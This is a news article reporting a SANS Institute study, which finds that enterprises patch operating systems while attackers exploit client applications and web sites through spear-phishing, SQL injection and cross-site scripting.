Businesses are prioritising unimportant security fixes while
leaving their IT systems open to sophisticated hacking attacks, a
major study released today reveals.
Analysis by US education and research body the
Sans Institute and leading
security firms shows that enterprises are concentrating their
resources on patching their operating systems.
But cyber-criminals are sidestepping the security measures by
using vulnerabilities in common applications such as Microsoft
Office and Adobe PDF reader to hack into company networks.
The study's findings will lead to a widespread reassessment of
how companies spend their IT security budget, said Allen Paller,
director of research at the Sans Institute.
"Enterprises are prioritising what is unimportant and delaying
fixing the main attack targets. I think the report will shift a lot
of money around in organisations because the findings are very hard
to ignore. Given the strength of the data, not acting would be
obvious negligence," he said.
The study is based on an analysis of attacks recorded by
intrusion prevention technology at 6,000 companies and security
vulnerabilities found in 9,000 organisations by security suppliers
Tippingpoint and Qualys. It reveals that hackers have shifted to
spear-phishing attacks - malicious e-mails which exploit
vulnerabilities in commonly used client programs - as the primary
form of attack against corporate systems.
Open to attack
Despite this, organisations are taking at least twice as long to
patch client-side vulnerabilities as they take to patch operating
system vulnerabilities, giving the highest priority risk less
attention than the lowest priority risk.
The study also warns that organisations are failing to
adequately secure their public-facing websites, which it claims is
the second most significant source of attack with more than 60% of
internet attacks being directed against web applications.
Hackers are infecting popular websites with links to documents
that contain malicious embedded code, and are increasingly
targeting thousands of specialised websites with smaller
audiences.
By identifying and exploiting vulnerabilities in the content
management systems used by these sites, attackers can infect
thousands of sites in a matter of hours. Hackers are using
vulnerabilities such as SQL injection and Cross-Site Scripting to
covert trusted websites into malicious websites that spread code to
visitors.
The study shows there has been a significant increase in the
number of people discovering zero-day vulnerabilities, which have
no fixes available at the time of discovery, over the past three
years. Some vulnerabilities have remained unpatched for two
years.
But there is a shortage of skilled researchers working in
government and software suppliers, placing IT users at a
disadvantage over the hackers.
| Key findings |
|---|
- The vast bulk of the nation-state attacks against military,
defence industrial base and key commercial organisations throughout
the developed world are being executed using highly targeted
spear-phishing attacks.
- The vast bulk of new zombies (networks of infected computers)
are created when unsuspecting users visit trusted websites that are
also infected.
- Both the spear-phishing and web attacks take advantage of
client-side vulnerabilities that are being given insufficient
attention by cyber defenders.
- The web attacks take advantage of web programming errors that
are not being picked up by common vulnerability
scanners.
|